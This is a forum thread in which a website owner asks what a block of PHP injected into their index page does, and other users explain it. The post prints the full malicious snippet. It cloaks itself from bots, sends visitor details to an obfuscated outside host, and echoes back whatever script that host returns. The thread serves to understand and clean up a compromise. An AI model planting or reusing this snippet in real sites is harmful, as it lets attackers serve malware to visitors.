bigBrumm Posted January 30, 2014 Share Posted January 30, 2014 someone broke into my site and added the following to my index page: error_reporting(0); ini_set('display_errors',0); $wp_amcjz4740 = @$_SERVER['HTTP_USER_AGENT'];if (( preg_match ('/Gecko|MSIE/i', $wp_amcjz4740) && !preg_match ('/bot/i', $wp_amcjz4740))){$wp_amcjz094740="http://"."template"."body".".com/body"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_amcjz4740);$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_amcjz094740);curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_4740amcjz = curl_exec ($ch); curl_close($ch);}if ( substr($wp_4740amcjz,1,3) === 'scr' ){ echo $wp_4740amcjz; } I've removed it and changed the FTP access. But I was wondering what it actually did? I can understand bits, but cannot really put everything together. Quote Link to comment Share on other sites More sharing options...
davidannis Posted January 30, 2014 Share Posted January 30, 2014 Looks to me like it looks to make sure that that the request was from a browser not from a bot and if it is adds malicious code to your page from a remote server. By not serving the malicious code to bots it delays Google warning users that your site is hosting malware. Quote Link to comment Share on other sites More sharing options...
bigBrumm Posted January 30, 2014 Author Share Posted January 30, 2014 thanks, how can I find out the address of the remote server is? Quote Link to comment Share on other sites More sharing options...
davidannis Posted January 30, 2014 Share Posted January 30, 2014 (edited) $wp_amcjz094740="http://"."template"."body".".com/body"."/ It looks to me like it is set to go to http[This is here to break the link]://template.body.com/body/ but I may be missing something and I'm not surfing over there to figure it out. Edited January 30, 2014 by davidannis Quote Link to comment Share on other sites More sharing options...
davidannis Posted January 30, 2014 Share Posted January 30, 2014 Is there anybody with more experience with cURL than me, who can confirm or correct me? I don't have confidence in my answer. Quote Link to comment Share on other sites More sharing options...
requinix Posted January 30, 2014 Share Posted January 30, 2014 (edited) It retrieves stuff from that server, after telling it which site it's running from and some information about the user, then will probably output whatever stuff it got back. It means they can put on your site anything from ads to malware to malicious Javascript to basically anything they want. Only thing it won't do is execute arbitrary PHP code. Edited January 30, 2014 by requinix Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.